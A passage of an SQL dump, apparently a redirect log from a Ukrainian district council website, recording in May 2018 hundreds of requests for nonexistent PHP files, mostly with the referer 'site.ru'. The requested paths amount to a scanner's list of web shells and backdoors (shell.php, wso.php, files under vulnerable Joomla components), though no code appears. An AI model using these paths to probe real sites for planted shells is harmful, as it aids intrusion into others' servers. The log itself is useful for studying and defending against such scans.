00:00:00',301),(31716,'http://malyn-rayrada.gov.ua/index.php/1760-pensiji-za-cherven-profinansovano-na-76-1-misyachnoji-potrebi',NULL,'','',13,0,'2018-05-02 18:51:20','0000-00-00 00:00:00',301),(31717,'http://malyn-rayrada.gov.ua/ws0.php',NULL,'http://site.ru','',1,0,'2018-05-02 18:53:43','0000-00-00 00:00:00',301),(31718,'http://malyn-rayrada.gov.ua/js.php',NULL,'http://site.ru','',1,0,'2018-05-02 19:13:45','0000-00-00 00:00:00',301),(31719,'http://malyn-rayrada.gov.ua/models.php',NULL,'http://site.ru','',1,0,'2018-05-02 19:15:14','0000-00-00 00:00:00',301),(31720,'http://malyn-rayrada.gov.ua/wp-xmlrpc.php',NULL,'http://site.ru','',1,0,'2018-05-02 19:21:03','0000-00-00 00:00:00',301),(31721,'http://malyn-rayrada.gov.ua/wp-press.php',NULL,'http://site.ru','',1,0,'2018-05-02 19:42:12','0000-00-00 00:00:00',301),(31722,'http://malyn-rayrada.gov.ua/cron.php',NULL,'http://site.ru','',3,0,'2018-05-02 19:42:39','0000-00-00 00:00:00',301),(31723,'http://malyn-rayrada.gov.ua/user.php',NULL,'http://site.ru','',3,0,'2018-05-02 19:44:21','0000-00-00 00:00:00',301),(31724,'http://malyn-rayrada.gov.ua/outpost.php',NULL,'http://site.ru','',2,0,'2018-05-02 19:46:54','0000-00-00 00:00:00',301),(31725,'http://malyn-rayrada.gov.ua/xgasupx.php',NULL,'http://site.ru','',1,0,'2018-05-02 19:48:28','0000-00-00 00:00:00',301),(31726,'http://malyn-rayrada.gov.ua/lfm.php',NULL,'http://site.ru','',4,0,'2018-05-02 20:10:11','0000-00-00 00:00:00',301),(31727,'http://malyn-rayrada.gov.ua/wp-blog-posts.php',NULL,'http://site.ru','',4,0,'2018-05-02 20:14:41','0000-00-00 00:00:00',301),(31728,'http://malyn-rayrada.gov.ua/pasts.php',NULL,'http://site.ru','',2,0,'2018-05-02 20:31:48','0000-00-00 00:00:00',301),(31729,'http://malyn-rayrada.gov.ua/ajax-requests.new.php',NULL,'http://site.ru','',2,0,'2018-05-02 20:32:52','0000-00-00 00:00:00',301),(31730,'http://malyn-rayrada.gov.ua/food.php',NULL,'http://site.ru','',5,0,'2018-05-02 20:34:48','0000-00-00 00:00:00',301),(31731,'http://malyn-rayrada.gov.ua/wp-models.php',NULL,'http://site.ru','',3,0,'2018-05-02 20:37:06','0000-00-00 00:00:00',301),(31732,'http://malyn-rayrada.gov.ua/config.php',NULL,'http://site.ru','',4,0,'2018-05-02 20:40:48','0000-00-00 00:00:00',301),(31733,'http://malyn-rayrada.gov.ua/htaccess.php',NULL,'http://site.ru','',3,0,'2018-05-02 20:56:45','0000-00-00 00:00:00',301),(31734,'http://malyn-rayrada.gov.ua/wp-organizer.php',NULL,'http://site.ru','',2,0,'2018-05-02 20:57:45','0000-00-00 00:00:00',301),(31735,'http://malyn-rayrada.gov.ua/eladm.php',NULL,'http://site.ru','',2,0,'2018-05-02 21:03:29','0000-00-00 00:00:00',301),(31736,'http://malyn-rayrada.gov.ua/inc.php',NULL,'http://site.ru','',3,0,'2018-05-02 21:24:59','0000-00-00 00:00:00',301),(31737,'http://malyn-rayrada.gov.ua/stats/wp-caches.php',NULL,'http://site.ru','',2,0,'2018-05-02 21:25:37','0000-00-00 00:00:00',301),(31738,'http://malyn-rayrada.gov.ua/modules/mod.php',NULL,'http://site.ru','',2,0,'2018-05-02 21:42:20','0000-00-00 00:00:00',301),(31739,'http://malyn-rayrada.gov.ua/data.php',NULL,'http://site.ru','',2,0,'2018-05-02 21:51:08','0000-00-00 00:00:00',301),(31740,'http://malyn-rayrada.gov.ua/.smileys/license.php',NULL,'http://site.ru','',2,0,'2018-05-02 21:52:26','0000-00-00 00:00:00',301),(31741,'http://malyn-rayrada.gov.ua/theme.php',NULL,'http://site.ru','',1,0,'2018-05-02 21:52:51','0000-00-00 00:00:00',301),(31742,'http://malyn-rayrada.gov.ua/verygs.php',NULL,'http://site.ru','',1,0,'2018-05-02 21:53:29','0000-00-00 00:00:00',301),(31743,'http://malyn-rayrada.gov.ua/mod_config.php',NULL,'http://site.ru','',3,0,'2018-05-02 21:56:09','0000-00-00 00:00:00',301),(31744,'http://malyn-rayrada.gov.ua/ekomi/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-05-02 22:15:43','0000-00-00 00:00:00',301),(31745,'http://malyn-rayrada.gov.ua/mary.php',NULL,'http://site.ru','',1,0,'2018-05-02 22:17:25','0000-00-00 00:00:00',301),(31746,'http://malyn-rayrada.gov.ua/customizer.php',NULL,'http://site.ru','',1,0,'2018-05-02 22:41:54','0000-00-00 00:00:00',301),(31747,'http://malyn-rayrada.gov.ua/index8632.php',NULL,'http://site.ru','',1,0,'2018-05-02 22:48:23','0000-00-00 00:00:00',301),(31748,'http://malyn-rayrada.gov.ua/.smileys/bacot.php',NULL,'http://site.ru','',2,0,'2018-05-02 23:11:15','0000-00-00 00:00:00',301),(31749,'http://malyn-rayrada.gov.ua/content-wrapper.php',NULL,'http://site.ru','',1,0,'2018-05-02 23:13:15','0000-00-00 00:00:00',301),(31750,'http://malyn-rayrada.gov.ua/page.php',NULL,'http://site.ru','',4,0,'2018-05-02 23:15:37','0000-00-00 00:00:00',301),(31751,'http://malyn-rayrada.gov.ua/ass.php',NULL,'http://site.ru','',1,0,'2018-05-03 00:02:06','0000-00-00 00:00:00',301),(31752,'http://malyn-rayrada.gov.ua/components/com_banners/models/mod.php',NULL,'http://site.ru','',2,0,'2018-05-03 00:03:34','0000-00-00 00:00:00',301),(31753,'http://malyn-rayrada.gov.ua/load-config.php',NULL,'http://site.ru','',2,0,'2018-05-03 00:11:48','0000-00-00 00:00:00',301),(31754,'http://malyn-rayrada.gov.ua/m1.php',NULL,'http://site.ru','',2,0,'2018-05-03 00:13:25','0000-00-00 00:00:00',301),(31755,'http://malyn-rayrada.gov.ua/_.php',NULL,'http://site.ru','',1,0,'2018-05-03 00:33:09','0000-00-00 00:00:00',301),(31756,'http://malyn-rayrada.gov.ua/cache/css.php',NULL,'http://site.ru','',1,0,'2018-05-03 00:35:24','0000-00-00 00:00:00',301),(31757,'http://malyn-rayrada.gov.ua/system.php',NULL,'http://site.ru','',1,0,'2018-05-03 00:57:32','0000-00-00 00:00:00',301),(31758,'http://malyn-rayrada.gov.ua/modules/mod_ariimageslidersa/098.php',NULL,'http://site.ru','',1,0,'2018-05-03 00:59:07','0000-00-00 00:00:00',301),(31759,'http://malyn-rayrada.gov.ua/wss.php',NULL,'http://site.ru','',2,0,'2018-05-03 01:05:01','0000-00-00 00:00:00',301),(31760,'http://malyn-rayrada.gov.ua/install/models.php',NULL,'http://site.ru','',1,0,'2018-05-03 01:52:43','0000-00-00 00:00:00',301),(31761,'http://malyn-rayrada.gov.ua/bigm.php',NULL,'http://site.ru','',4,0,'2018-05-03 01:54:55','0000-00-00 00:00:00',301),(31762,'http://malyn-rayrada.gov.ua/aul.php',NULL,'http://site.ru','',1,0,'2018-05-03 01:59:33','0000-00-00 00:00:00',301),(31763,'http://malyn-rayrada.gov.ua/532299.php',NULL,'http://site.ru','',4,0,'2018-05-03 02:00:02','0000-00-00 00:00:00',301),(31764,'http://malyn-rayrada.gov.ua/readme.php',NULL,'http://site.ru','',4,0,'2018-05-03 02:01:08','0000-00-00 00:00:00',301),(31765,'http://malyn-rayrada.gov.ua/marvins.php',NULL,'http://site.ru','',2,0,'2018-05-03 02:19:57','0000-00-00 00:00:00',301),(31766,'http://malyn-rayrada.gov.ua/ui-elements.php',NULL,'http://site.ru','',1,0,'2018-05-03 02:22:04','0000-00-00 00:00:00',301),(31767,'http://malyn-rayrada.gov.ua/f.php',NULL,'http://site.ru','',4,0,'2018-05-03 02:36:18','0000-00-00 00:00:00',301),(31768,'http://malyn-rayrada.gov.ua/db-config.php',NULL,'http://site.ru','',1,0,'2018-05-03 02:45:31','0000-00-00 00:00:00',301),(31769,'http://malyn-rayrada.gov.ua/therm.php',NULL,'http://site.ru','',3,0,'2018-05-03 03:06:28','0000-00-00 00:00:00',301),(31770,'http://malyn-rayrada.gov.ua/meuhy.php',NULL,'http://site.ru','',1,0,'2018-05-03 03:07:27','0000-00-00 00:00:00',301),(31771,'http://malyn-rayrada.gov.ua/libraries/joomla/template/mark.php',NULL,'http://site.ru','',1,0,'2018-05-03 03:14:27','0000-00-00 00:00:00',301),(31772,'http://malyn-rayrada.gov.ua/rois.php',NULL,'http://site.ru','',1,0,'2018-05-03 03:17:52','0000-00-00 00:00:00',301),(31773,'http://malyn-rayrada.gov.ua/babbitts.php',NULL,'http://site.ru','',2,0,'2018-05-03 03:31:07','0000-00-00 00:00:00',301),(31774,'http://malyn-rayrada.gov.ua/dsfghs.php',NULL,'http://site.ru','',1,0,'2018-05-03 03:32:43','0000-00-00 00:00:00',301),(31775,'http://malyn-rayrada.gov.ua/k.php',NULL,'http://site.ru','',1,0,'2018-05-03 03:33:07','0000-00-00 00:00:00',301),(31776,'http://malyn-rayrada.gov.ua/mide.php',NULL,'http://site.ru','',2,0,'2018-05-03 03:34:34','0000-00-00 00:00:00',301),(31777,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/help.php',NULL,'http://site.ru','',2,0,'2018-05-03 03:35:42','0000-00-00 00:00:00',301),(31778,'http://malyn-rayrada.gov.ua/categories.php',NULL,'http://site.ru','',3,0,'2018-05-03 03:36:25','0000-00-00 00:00:00',301),(31779,'http://malyn-rayrada.gov.ua/h4ck_.php',NULL,'http://site.ru','',2,0,'2018-05-03 03:58:39','0000-00-00 00:00:00',301),(31780,'http://malyn-rayrada.gov.ua/config-sample.php',NULL,'http://site.ru','',3,0,'2018-05-03 04:06:44','0000-00-00 00:00:00',301),(31781,'http://malyn-rayrada.gov.ua/hello.php',NULL,'http://site.ru','',1,0,'2018-05-03 05:12:51','0000-00-00 00:00:00',301),(31782,'http://malyn-rayrada.gov.ua/components/com_foxcontact/line.php',NULL,'http://site.ru','',1,0,'2018-05-03 05:18:15','0000-00-00 00:00:00',301),(31783,'http://malyn-rayrada.gov.ua/ok.php',NULL,'http://site.ru','',2,0,'2018-05-03 05:22:12','0000-00-00 00:00:00',301),(31784,'http://malyn-rayrada.gov.ua/conf.ini.php',NULL,'http://site.ru','',3,0,'2018-05-03 05:26:31','0000-00-00 00:00:00',301),(31785,'http://malyn-rayrada.gov.ua/components/com_foxcontact/1.php',NULL,'http://site.ru','',4,0,'2018-05-03 05:29:38','0000-00-00 00:00:00',301),(31786,'http://malyn-rayrada.gov.ua/print.php',NULL,'http://site.ru','',3,0,'2018-05-03 06:21:01','0000-00-00 00:00:00',301),(31787,'http://malyn-rayrada.gov.ua/so.php',NULL,'http://site.ru','',21,0,'2018-05-03 06:23:09','0000-00-00 00:00:00',301),(31788,'http://malyn-rayrada.gov.ua/authorize.php',NULL,'http://site.ru','',1,0,'2018-05-03 07:07:38','0000-00-00 00:00:00',301),(31789,'http://malyn-rayrada.gov.ua/fghhgfs.php',NULL,'http://site.ru','',2,0,'2018-05-03 07:36:46','0000-00-00 00:00:00',301),(31790,'http://malyn-rayrada.gov.ua/lndex.php',NULL,'http://site.ru','',2,0,'2018-05-03 08:00:25','0000-00-00 00:00:00',301),(31791,'http://malyn-rayrada.gov.ua/error_log.php',NULL,'http://site.ru','',2,0,'2018-05-03 08:07:21','0000-00-00 00:00:00',301),(31792,'http://malyn-rayrada.gov.ua/ler.php',NULL,'http://site.ru','',1,0,'2018-05-03 08:17:29','0000-00-00 00:00:00',301),(31793,'http://malyn-rayrada.gov.ua/libraries/joomla/template/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-05-03 08:38:28','0000-00-00 00:00:00',301),(31794,'http://malyn-rayrada.gov.ua/cache/content-post.php',NULL,'http://site.ru','',1,0,'2018-05-03 08:39:05','0000-00-00 00:00:00',301),(31795,'http://malyn-rayrada.gov.ua/cry.php',NULL,'http://site.ru','',1,0,'2018-05-03 08:42:10','0000-00-00 00:00:00',301),(31796,'http://malyn-rayrada.gov.ua/prom.php',NULL,'http://site.ru','',1,0,'2018-05-03 09:23:51','0000-00-00 00:00:00',301),(31797,'http://malyn-rayrada.gov.ua/cwyiog.php',NULL,'http://site.ru','',3,0,'2018-05-03 09:45:12','0000-00-00 00:00:00',301),(31798,'http://malyn-rayrada.gov.ua/includes/img/mode.php',NULL,'http://site.ru','',1,0,'2018-05-03 10:09:54','0000-00-00 00:00:00',301),(31799,'http://malyn-rayrada.gov.ua/mod_ariimageslidersa.php',NULL,'http://site.ru','',2,0,'2018-05-03 10:13:10','0000-00-00 00:00:00',301),(31800,'http://malyn-rayrada.gov.ua/components/com_user/views/reset/mod.php',NULL,'http://site.ru','',2,0,'2018-05-03 10:43:14','0000-00-00 00:00:00',301),(31801,'http://malyn-rayrada.gov.ua/baws.php',NULL,'http://site.ru','',2,0,'2018-05-03 11:11:48','0000-00-00 00:00:00',301),(31802,'http://malyn-rayrada.gov.ua/pamelas.php',NULL,'http://site.ru','',1,0,'2018-05-03 11:13:27','0000-00-00 00:00:00',301),(31803,'http://malyn-rayrada.gov.ua/defined.php',NULL,'http://site.ru','',1,0,'2018-05-03 11:36:03','0000-00-00 00:00:00',301),(31804,'http://malyn-rayrada.gov.ua/wp-wpphp.php',NULL,'http://site.ru','',2,0,'2018-05-03 11:38:55','0000-00-00 00:00:00',301),(31805,'http://malyn-rayrada.gov.ua/wp-seo.php',NULL,'http://site.ru','',3,0,'2018-05-03 11:58:42','0000-00-00 00:00:00',301),(31806,'http://malyn-rayrada.gov.ua/systems.php',NULL,'http://site.ru','',1,0,'2018-05-03 12:26:02','0000-00-00 00:00:00',301),(31807,'http://malyn-rayrada.gov.ua/camilles.php',NULL,'http://site.ru','',1,0,'2018-05-03 12:47:14','0000-00-00 00:00:00',301),(31808,'http://malyn-rayrada.gov.ua/hexhglal.php',NULL,'http://site.ru','',1,0,'2018-05-03 12:59:22','0000-00-00 00:00:00',301),(31809,'http://malyn-rayrada.gov.ua/wp-backup.php',NULL,'http://site.ru','',1,0,'2018-05-03 13:12:35','0000-00-00 00:00:00',301),(31810,'http://malyn-rayrada.gov.ua/wp-api.php',NULL,'http://site.ru','',2,0,'2018-05-03 13:54:49','0000-00-00 00:00:00',301),(31811,'http://malyn-rayrada.gov.ua/scc.php',NULL,'http://site.ru','',1,0,'2018-05-03 14:08:09','0000-00-00 00:00:00',301),(31812,'http://malyn-rayrada.gov.ua/components/sec.php',NULL,'http://site.ru','',1,0,'2018-05-03 14:20:06','0000-00-00 00:00:00',301),(31813,'http://malyn-rayrada.gov.ua/modules/img/mode.php',NULL,'http://site.ru','',2,0,'2018-05-03 14:21:19','0000-00-00 00:00:00',301),(31814,'http://malyn-rayrada.gov.ua/assets/images/wp-post.php',NULL,'http://site.ru','',2,0,'2018-05-03 14:47:45','0000-00-00 00:00:00',301),(31815,'http://malyn-rayrada.gov.ua/sec.php',NULL,'http://site.ru','',2,0,'2018-05-03 15:03:51','0000-00-00 00:00:00',301),(31816,'http://malyn-rayrada.gov.ua/phpinfoer.php',NULL,'','',1,0,'2018-05-03 15:07:54','0000-00-00 00:00:00',301),(31817,'http://malyn-rayrada.gov.ua/df.php',NULL,'http://site.ru','',3,0,'2018-05-03 15:11:31','0000-00-00 00:00:00',301),(31818,'http://malyn-rayrada.gov.ua/test.php',NULL,'http://site.ru','',2,0,'2018-05-03 15:14:51','0000-00-00 00:00:00',301),(31819,'http://malyn-rayrada.gov.ua/lib.php',NULL,'http://site.ru','',1,0,'2018-05-03 15:40:13','0000-00-00 00:00:00',301),(31820,'http://malyn-rayrada.gov.ua/roots.php',NULL,'http://site.ru','',1,0,'2018-05-03 16:01:22','0000-00-00 00:00:00',301),(31821,'http://malyn-rayrada.gov.ua/admin_login.php',NULL,'http://site.ru','',2,0,'2018-05-03 16:16:46','0000-00-00 00:00:00',301),(31822,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.4/marvins.php',NULL,'http://site.ru','',1,0,'2018-05-03 16:33:53','0000-00-00 00:00:00',301),(31823,'http://malyn-rayrada.gov.ua/cgi.php',NULL,'http://site.ru','',1,0,'2018-05-03 16:36:23','0000-00-00 00:00:00',301),(31824,'http://malyn-rayrada.gov.ua/libraries/joomla/template/mide.php',NULL,'http://site.ru','',1,0,'2018-05-03 16:56:24','0000-00-00 00:00:00',301),(31825,'http://malyn-rayrada.gov.ua/generationmap.php',NULL,'http://site.ru','',2,0,'2018-05-03 16:58:31','0000-00-00 00:00:00',301),(31826,'http://malyn-rayrada.gov.ua/home.php',NULL,'http://site.ru','',2,0,'2018-05-03 20:08:07','0000-00-00 00:00:00',301),(31827,'http://malyn-rayrada.gov.ua/gallery.php',NULL,'http://site.ru','',2,0,'2018-05-04 00:53:19','0000-00-00 00:00:00',301),(31828,'http://malyn-rayrada.gov.ua/miwed.php',NULL,'http://site.ru','',1,0,'2018-05-04 02:33:43','0000-00-00 00:00:00',301),(31829,'http://malyn-rayrada.gov.ua/shell.php',NULL,'http://site.ru','',3,0,'2018-05-04 04:08:58','0000-00-00 00:00:00',301),(31830,'http://malyn-rayrada.gov.ua/b.php',NULL,'http://site.ru','',2,0,'2018-05-04 12:19:31','0000-00-00 00:00:00',301),(31831,'http://malyn-rayrada.gov.ua/wp-mosx.php?x=1',NULL,'','',1,0,'2018-05-04 23:04:02','0000-00-00 00:00:00',301),(31832,'http://malyn-rayrada.gov.ua/wp-info.php',NULL,'','',2,0,'2018-05-05 05:30:14','0000-00-00 00:00:00',301),(31833,'http://malyn-rayrada.gov.ua/wp-sbb.php',NULL,'','',2,0,'2018-05-05 10:47:37','0000-00-00 00:00:00',301),(31834,'http://malyn-rayrada.gov.ua/meniacle/wp-blog-header.php',NULL,'','',1,0,'2018-05-05 23:36:06','0000-00-00 00:00:00',301),(31835,'http://malyn-rayrada.gov.ua/wp-index.php',NULL,'','',1,0,'2018-05-06 02:37:09','0000-00-00 00:00:00',301),(31836,'http://malyn-rayrada.gov.ua/wp-pas.php',NULL,'','',1,0,'2018-05-06 18:32:36','0000-00-00 00:00:00',301),(31837,'http://malyn-rayrada.gov.ua/wp-pols.php',NULL,'','',1,0,'2018-05-06 21:46:13','0000-00-00 00:00:00',301),(31838,'http://malyn-rayrada.gov.ua/bgeiis.php',NULL,'','',1,0,'2018-05-07 00:43:41','0000-00-00 00:00:00',301),(31839,'http://malyn-rayrada.gov.ua/language/system_infos.php',NULL,'http://site.ru','',1,0,'2018-05-07 06:24:36','0000-00-00 00:00:00',301),(31840,'http://malyn-rayrada.gov.ua/components/com_foxcontact/home.php',NULL,'http://site.ru','',1,0,'2018-05-07 06:32:51','0000-00-00 00:00:00',301),(31841,'http://malyn-rayrada.gov.ua/modules/mod_helloworld/mod_helloworld.php',NULL,'http://site.ru','',3,0,'2018-05-07 07:42:45','0000-00-00 00:00:00',301),(31842,'http://malyn-rayrada.gov.ua/popup-pomo.php',NULL,'http://site.ru','',3,0,'2018-05-07 08:59:41','0000-00-00 00:00:00',301),(31843,'http://malyn-rayrada.gov.ua/cache/error.php',NULL,'http://site.ru','',1,0,'2018-05-07 09:02:17','0000-00-00 00:00:00',301),(31844,'http://malyn-rayrada.gov.ua/components/com_foxcontact/07.php',NULL,'http://site.ru','',4,0,'2018-05-07 09:28:25','0000-00-00 00:00:00',301),(31845,'http://malyn-rayrada.gov.ua/components/s.php',NULL,'http://site.ru','',1,0,'2018-05-07 09:44:55','0000-00-00 00:00:00',301),(31846,'http://malyn-rayrada.gov.ua/permalink/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-05-07 10:04:45','0000-00-00 00:00:00',301),(31847,'http://malyn-rayrada.gov.ua/components/com_contact/contact.lib.php',NULL,'http://site.ru','',1,0,'2018-05-07 10:14:38','0000-00-00 00:00:00',301),(31848,'http://malyn-rayrada.gov.ua/profile/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-05-07 10:42:09','0000-00-00 00:00:00',301),(31849,'http://malyn-rayrada.gov.ua/media/system_infos.php',NULL,'http://site.ru','',1,0,'2018-05-07 11:07:57','0000-00-00 00:00:00',301),(31850,'http://malyn-rayrada.gov.ua/wp-config_bak.php?x=1',NULL,'','',1,0,'2018-05-07 11:40:38','0000-00-00 00:00:00',301),(31851,'http://malyn-rayrada.gov.ua/options/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-05-07 12:01:18','0000-00-00 00:00:00',301),(31852,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/toor.php',NULL,'http://site.ru','',1,0,'2018-05-07 12:23:29','0000-00-00 00:00:00',301),(31853,'http://malyn-rayrada.gov.ua/cache/404.php',NULL,'http://site.ru','',2,0,'2018-05-07 12:23:30','0000-00-00 00:00:00',301),(31854,'http://malyn-rayrada.gov.ua/media/system/css/shewil!.php',NULL,'http://site.ru','',2,0,'2018-05-07 12:55:00','0000-00-00 00:00:00',301),(31855,'http://malyn-rayrada.gov.ua/components/com_foxcontact/7.php',NULL,'http://site.ru','',4,0,'2018-05-07 13:36:21','0000-00-00 00:00:00',301),(31856,'http://malyn-rayrada.gov.ua/plugins/content/geshi/geshi/geshi/geshi.php',NULL,'http://site.ru','',2,0,'2018-05-07 14:01:39','0000-00-00 00:00:00',301),(31857,'http://malyn-rayrada.gov.ua/images/banners/smile.php',NULL,'http://site.ru','',1,0,'2018-05-07 14:02:54','0000-00-00 00:00:00',301),(31858,'http://malyn-rayrada.gov.ua/tools/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-05-07 14:06:52','0000-00-00 00:00:00',301),(31859,'http://malyn-rayrada.gov.ua/images/wso.php',NULL,'http://site.ru','',4,0,'2018-05-07 14:08:04','0000-00-00 00:00:00',301),(31860,'http://malyn-rayrada.gov.ua/libraries/css.php',NULL,'http://site.ru','',3,0,'2018-05-07 14:28:37','0000-00-00 00:00:00',301),(31861,'http://malyn-rayrada.gov.ua/components/com_search/models/mark.php',NULL,'http://site.ru','',1,0,'2018-05-07 15:08:50','0000-00-00 00:00:00',301),(31862,'http://malyn-rayrada.gov.ua/widgets/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-05-07 15:10:16','0000-00-00 00:00:00',301),(31863,'http://malyn-rayrada.gov.ua/phpmail/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-05-07 15:34:25','0000-00-00 00:00:00',301),(31864,'http://malyn-rayrada.gov.ua/log/logo_img.php',NULL,'http://site.ru','',1,0,'2018-05-07 16:07:22','0000-00-00 00:00:00',301),(31865,'http://malyn-rayrada.gov.ua/term/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-05-07 16:46:45','0000-00-00 00:00:00',301),(31866,'http://malyn-rayrada.gov.ua/ctietu/girbkrl.php',NULL,'http://site.ru','',1,0,'2018-05-07 16:46:56','0000-00-00 00:00:00',301),(31867,'http://malyn-rayrada.gov.ua/scripts/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-05-07 17:34:37','0000-00-00 00:00:00',301),(31868,'http://malyn-rayrada.gov.ua/templates/0.php',NULL,'http://site.ru','',1,0,'2018-05-07 17:37:33','0000-00-00 00:00:00',301),(31869,'http://malyn-rayrada.gov.ua/cache/cache.php',NULL,'http://site.ru','',2,0,'2018-05-07 17:40:28','0000-00-00 00:00:00',301),(31870,'http://malyn-rayrada.gov.ua/components/com_foxcontact/w.php',NULL,'http://site.ru','',1,0,'2018-05-07 17:50:29','0000-00-00 00:00:00',301),(31871,'http://malyn-rayrada.gov.ua/components/com_foxcontact/f.php',NULL,'http://site.ru','',3,0,'2018-05-07 18:04:04','0000-00-00 00:00:00',301),(31872,'http://malyn-rayrada.gov.ua/pressthis/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-05-07 18:22:07','0000-00-00 00:00:00',301),(31873,'http://malyn-rayrada.gov.ua/components/com_b2jcontact/config.php',NULL,'http://site.ru','',2,0,'2018-05-07 18:30:16','0000-00-00 00:00:00',301),(31874,'http://malyn-rayrada.gov.ua/includes/tmp.php',NULL,'http://site.ru','',3,0,'2018-05-07 18:48:54','0000-00-00 00:00:00',301),(31875,'http://malyn-rayrada.gov.ua/setupconfig/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-05-07 21:16:21','0000-00-00 00:00:00',301),(31876,'http://malyn-rayrada.gov.ua/language/en-gb/error.php',NULL,'http://site.ru','',1,0,'2018-05-07 21:48:54','0000-00-00 00:00:00',301),(31877,'http://malyn-rayrada.gov.ua/components/com_foxcontact/idx.php',NULL,'http://site.ru','',4,0,'2018-05-07 22:33:27','0000-00-00 00:00:00',301),(31878,'http://malyn-rayrada.gov.ua/modules/mod_ariimageslidersa/help.php',NULL,'http://site.ru','',1,0,'2018-05-07 22:49:13','0000-00-00 00:00:00',301),(31879,'http://malyn-rayrada.gov.ua/components/com_banners/1.php',NULL,'http://site.ru','',1,0,'2018-05-07 23:21:13','0000-00-00 00:00:00',301),(31880,'http://malyn-rayrada.gov.ua/language/lv-lv/lv-lv.localise4.php',NULL,'http://site.ru','',1,0,'2018-05-07 23:24:55','0000-00-00 00:00:00',301),(31881,'http://malyn-rayrada.gov.ua/install/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-05-07 23:47:02','0000-00-00 00:00:00',301),(31882,'http://malyn-rayrada.gov.ua/includes/rsq.php',NULL,'http://site.ru','',3,0,'2018-05-08 00:02:05','0000-00-00 00:00:00',301),(31883,'http://malyn-rayrada.gov.ua/xmlrpc/system_infos.php',NULL,'http://site.ru','',2,0,'2018-05-08 00:51:41','0000-00-00 00:00:00',301),(31884,'http://malyn-rayrada.gov.ua/language/de-de/1.php',NULL,'http://site.ru','',5,0,'2018-05-08 01:15:04','0000-00-00 00:00:00',301),(31885,'http://malyn-rayrada.gov.ua/modules/mod_poll/tmpl/my.php',NULL,'http://site.ru','',2,0,'2018-05-08 01:15:37','0000-00-00 00:00:00',301),(31886,'http://malyn-rayrada.gov.ua/templates/system_infos.php',NULL,'http://site.ru','',2,0,'2018-05-08 01:16:04','0000-00-00 00:00:00',301),(31887,'http://malyn-rayrada.gov.ua/general/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-05-08 01:36:50','0000-00-00 00:00:00',301),(31888,'http://malyn-rayrada.gov.ua/cache/sok/s.php',NULL,'http://site.ru','',2,0,'2018-05-08 01:37:18','0000-00-00 00:00:00',301),(31889,'http://malyn-rayrada.gov.ua/components/com_foxcontact/3.php',NULL,'http://site.ru','',1,0,'2018-05-08 01:41:11','0000-00-00 00:00:00',301),(31890,'http://malyn-rayrada.gov.ua/components/com_foxcontact/uploads/ly.php',NULL,'http://site.ru','',6,0,'2018-05-08 02:04:27','0000-00-00 00:00:00',301),(31891,'http://malyn-rayrada.gov.ua/modules/mod_footer/tmpl/mark.php',NULL,'http://site.ru','',2,0,'2018-05-08 02:04:39','0000-00-00 00:00:00',301),(31892,'http://malyn-rayrada.gov.ua/modules/mod_articles_tags/tmpl/mide.php',NULL,'http://site.ru','',1,0,'2018-05-08 02:07:36','0000-00-00 00:00:00',301),(31893,'http://malyn-rayrada.gov.ua/tmp/kd.php',NULL,'http://site.ru','',1,0,'2018-05-08 02:28:22','0000-00-00 00:00:00',301),(31894,'http://malyn-rayrada.gov.ua/updatecore/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-05-08 02:48:49','0000-00-00 00:00:00',301),(31895,'http://malyn-rayrada.gov.ua/assets/images/content-post.php',NULL,'http://site.ru','',1,0,'2018-05-08 03:37:41','0000-00-00 00:00:00',301),(31896,'http://malyn-rayrada.gov.ua/tmp/x.php',NULL,'http://site.ru','',1,0,'2018-05-08 03:40:56','0000-00-00 00:00:00',301),(31897,'http://malyn-rayrada.gov.ua/cli/system_infos.php',NULL,'http://site.ru','',1,0,'2018-05-08 04:22:00','0000-00-00 00:00:00',301),(31898,'http://malyn-rayrada.gov.ua/libraries/phputf8/str_parser.php',NULL,'http://site.ru','',1,0,'2018-05-08 04:38:18','0000-00-00 00:00:00',301),(31899,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/shell.php',NULL,'http://site.ru','',1,0,'2018-05-08 04:38:34','0000-00-00 00:00:00',301),(31900,'http://malyn-rayrada.gov.ua/logs/system_infos.php',NULL,'http://site.ru','',1,0,'2018-05-08 04:53:01','0000-00-00 00:00:00',301),(31901,'http://malyn-rayrada.gov.ua/components/com_foxcontact/6.php',NULL,'http://site.ru','',1,0,'2018-05-08 04:54:27','0000-00-00 00:00:00',301),(31902,'http://malyn-rayrada.gov.ua/postnew/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-05-08 05:18:04','0000-00-00 00:00:00',301),(31903,'http://malyn-rayrada.gov.ua/layouts/system_infos.php',NULL,'http://site.ru','',1,0,'2018-05-08 05:24:17','0000-00-00 00:00:00',301),(31904,'http://malyn-rayrada.gov.ua/modules/mod_myblog_archive/mod_myblog_archive1.php',NULL,'http://site.ru','',1,0,'2018-05-08 05:26:52','0000-00-00 00:00:00',301),(31905,'http://malyn-rayrada.gov.ua/includes/d.php',NULL,'http://site.ru','',3,0,'2018-05-08 05:45:26','0000-00-00 00:00:00',301),(31906,'http://malyn-rayrada.gov.ua/components/com_jooomlat/s.php',NULL,'http://site.ru','',3,0,'2018-05-08 05:54:48','0000-00-00 00:00:00',301),(31907,'http://malyn-rayrada.gov.ua/cache/logo_img.php',NULL,'http://site.ru','',1,0,'2018-05-08 06:09:39','0000-00-00 00:00:00',301),(31908,'http://malyn-rayrada.gov.ua/components/com_b2jcontact/x0x04.php',NULL,'http://site.ru','',1,0,'2018-05-08 06:57:42','0000-00-00 